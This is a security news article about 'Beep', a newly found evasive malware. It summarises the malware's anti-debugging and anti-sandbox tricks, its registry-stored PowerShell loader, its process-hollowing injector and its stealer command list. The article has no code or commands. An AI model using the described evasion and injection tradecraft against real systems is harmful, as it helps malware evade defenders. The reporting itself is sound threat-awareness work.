430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Beep, a new highly evasive malware appeared in the threat landscape

Experts detected a new evasive malware dubbed Beep, it implements many anti-debugging and anti-sandbox techniques. Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox techniques. The name Beep comes from the use of techniques involved in delaying the execution through the use of the Beep API function. The experts […]

beep malware.png

Experts detected a new evasive malware dubbed Beep, it implements many anti-debugging and anti-sandbox techniques.

Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox techniques.

The name Beep comes from the use of techniques involved in delaying the execution through the use of the Beep API function.

The experts noticed several new samples that were uploaded to VirusTotal (VT) as .dll, .gif or .jpg files. The samples were labeled as ‘spreader’ and ‘detect-debug-environment’ by VT and were used to drop additional payloads.  

“Once we dug into this sample, we observed the use of a significant amount of evasion techniques. It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find.” reads the analysis published by the experts. “One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.” 

After performing anti-debugging and anti-vm checks, the malware dropper creates a new Windows Registry key and executes a Base64-encoded PowerShell script stored in the value (named ‘AphroniaHaimavati’) of the key.

In turn, the PowerShell script retrieves an injector from a remote server, which extracts and launches the payload using the Process Hollowing injection technique.

The attack chain ends by dropping an information stealer on the victim’s system, it supports multiple commands, some of which are not yet implemented, including:

  • balancer – not implemented yet. 
  • init – not implemented yet. 
  • screenshoot – appears to collect the process list. 
  • task – not implemented yet. 
  • destroy – not implemented yet. 
  • shellcode – executes additional shellcode. 
  • dll – executes a dll file. 
  • exe – executes a .exe file. 
  • Additional – collects additional info. 
  • knock_timeout – changes C&C “keep-alive” intervals. 
beep malware.png

The experts pointed out that once the Beep malware has infected a system, it can be used to spread a wide range of additional malicious payloads and hacking, including ransomware.

“The new Beep malware’s efforts to evade detection set it apart from other malware. The sheer number of evasive techniques it implements to avoid sandboxes, VMs, and other debugging techniques is not often seen.” concludes the report which also includes Indicators of Compromise (IoCs) for this emerging threat.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Beep malware)